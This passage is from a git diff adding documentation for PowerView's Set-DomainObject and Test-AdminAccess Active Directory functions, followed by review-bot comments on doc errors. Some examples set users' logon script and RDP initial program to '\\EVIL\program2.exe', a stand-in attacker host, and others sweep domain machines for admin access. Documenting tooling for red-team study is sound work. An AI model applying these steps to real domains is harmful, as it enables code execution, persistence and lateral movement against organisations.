LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object 
testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose +``` + +Cleares the 'department' field for both object identities. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -Identity testuser -Properties scriptpath +``` + +scriptpath +---------- +\\\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser 
-Properties scriptpath + +scriptpath +---------- +\\\\EVIL\program2.exe + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Set +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: Reaplce + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -XOR +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Clear +Specifies an array of object properties that will be cleared in the directory. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +{{Fill SecurityMasks Description}} + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ADObject + +Custom PSObject with translated AD object property fields, if -PassThru is enabled. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -PassThru and -Raw are enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 0000000..84eab4e --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md 
@@ -0,0 +1,101 @@ +# Test-AdminAccess + +## SYNOPSIS +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Test-AdminAccess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. +If this succeeds, the current user context +has local administrator acess to the target. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Test-AdminAccess -ComputerName sqlserver +``` + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Test-AdminAccess +``` + +Returns what machines in the domain the current user has access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + -- cgit v1.2.3
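Review bot: in docs/Recon/Invoke-RevertToSelf.md, EXAMPLE 1 closes its code fence right after the `$SecPassword = ConvertTo-SecureString ...` line, so the `$Cred = ...`, `$Token = Invoke-UserImpersonation -Credential $Cred` and `Invoke-RevertToSelf -TokenHandle $Token` lines render as body text instead of code. Move the closing fence below the last command so the example can be copied as one unit. The same split shows up in the multi-line examples of Invoke-UserImpersonation.md, New-DomainGroup.md, New-DomainUser.md and Test-AdminAccess.md in this commit, so it is worth fixing in the comment-based help or the generation step rather than by hand in each file.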
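Review bot: in docs/Recon/Invoke-UserImpersonation.md, EXAMPLE 1 calls `Invoke-UserImpersonation -Credential $Cred` without capturing the result, although DESCRIPTION and OUTPUTS say the IntPtr token handle is returned for later use with Invoke-RevertToSelf. As written, a reader following the example has no handle to pass to `Invoke-RevertToSelf -TokenHandle`, so the CloseHandle() path documented in Invoke-RevertToSelf.md is never reached. Suggest showing `$Token = Invoke-UserImpersonation -Credential $Cred` and ending the example with `Invoke-RevertToSelf -TokenHandle $Token`. Separately, -Quiet refers to "warnings about STA vs MTA" that DESCRIPTION never introduces; one sentence on why the apartment state matters for thread impersonation would make the switch understandable.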
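Review bot: in docs/Recon/New-DomainGroup.md, the SYNOPSIS carries a developer TODO ("implement all properties that New-ADGroup implements") that will ship in the rendered help, and its URL (https://technet.microsoft.com/en-us/library/ee617253.aspx) is identical to the one New-DomainUser.md gives for New-ADUser, so at least one of the two links points at the wrong cmdlet. Move the TODO into NOTES or a source comment and check the link target. The -Domain text ("the domain to use to search for user/group principals") also reads as copied from a query function; for a function that creates a group it should say which domain the group is created in.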
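Review bot: in docs/Recon/New-DomainUser.md, the text under EXAMPLE 3 says it creates the 'andy' user "with the specified description and password", but the command shown is `New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember ...` with no -Description argument. Either add -Description to the command or drop "description and" from the sentence. The SYNOPSIS has the same in-line TODO as New-DomainGroup.md and should move to NOTES, and all three examples have only their first line inside the code fence.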
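Review bot: in docs/Recon/Remove-RemoteConnection.md, SYNOPSIS and DESCRIPTION both name New-RemoteConnection as the function whose connection is destroyed, while the file list of this commit adds docs/Recon/Add-RemoteConnection.md. If Add-RemoteConnection is the counterpart, the name here is stale and should be updated in both places so the cross-reference resolves. The three examples also have no explanatory sentence, unlike the examples in the other files of this commit; a line each stating which connection is removed (the IPC$ mount versus the given UNC path) would help.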
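Review bot: in docs/Recon/Resolve-IPAddress.md, the -ComputerName section still contains the generator placeholder `{{Fill ComputerName Description}}`, so the only parameter of the function is undocumented. Fill it in from the DESCRIPTION (the hostname or hostnames to resolve, defaulting to `$Env:COMPUTERNAME`). INPUTS states "Accepts one or more IP address strings on the pipeline", which contradicts a function that takes hostnames and returns IP addresses, and "hostename" is misspelled in both SYNOPSIS and DESCRIPTION.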
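Review bot: in docs/Recon/Set-DomainObject.md, OUTPUTS describes results returned "if -PassThru is enabled" and "if -PassThru and -Raw are enabled", but neither switch appears in SYNTAX or PARAMETERS, so the documented output cannot be requested as written. Either document the switches or correct OUTPUTS. Other inconsistencies in the same file: -ServerTimeLimit says "Default of 120 seconds" while its block lists `Default value: 0`; -Identity says "Wildcards accepted" while its block lists `Accept wildcard characters: False`; -SecurityMasks still reads `{{Fill SecurityMasks Description}}`; the -Set alias is spelled "Reaplce", which needs fixing in the function's alias declaration; and "gven" (SYNOPSIS) and "Cleares" (EXAMPLE 3) are typos. In EXAMPLE 4 and EXAMPLE 5 the follow-up commands and their output sit outside the code fence, which makes the before and after values hard to read.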
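Review bot: in docs/Recon/Test-AdminAccess.md, RELATED LINKS wraps two URLs (the Metasploit local_admin_search_enum.rb module and the powershellmagazine.com article) in a single Markdown link with a line break inside both the label and the target, which will not render as a working link. Emit one link per line. In OUTPUTS, "containing the ComputerName and 'IsAdmin' ... along with the ComputerName added" names ComputerName twice and should be reduced to the two properties actually returned, and "acess" in DESCRIPTION is a typo. The credited Metasploit authors in SYNOPSIS each end in an empty `\'`, which suggests contact details were dropped during generation; either restore them in the source help or remove the dangling escapes.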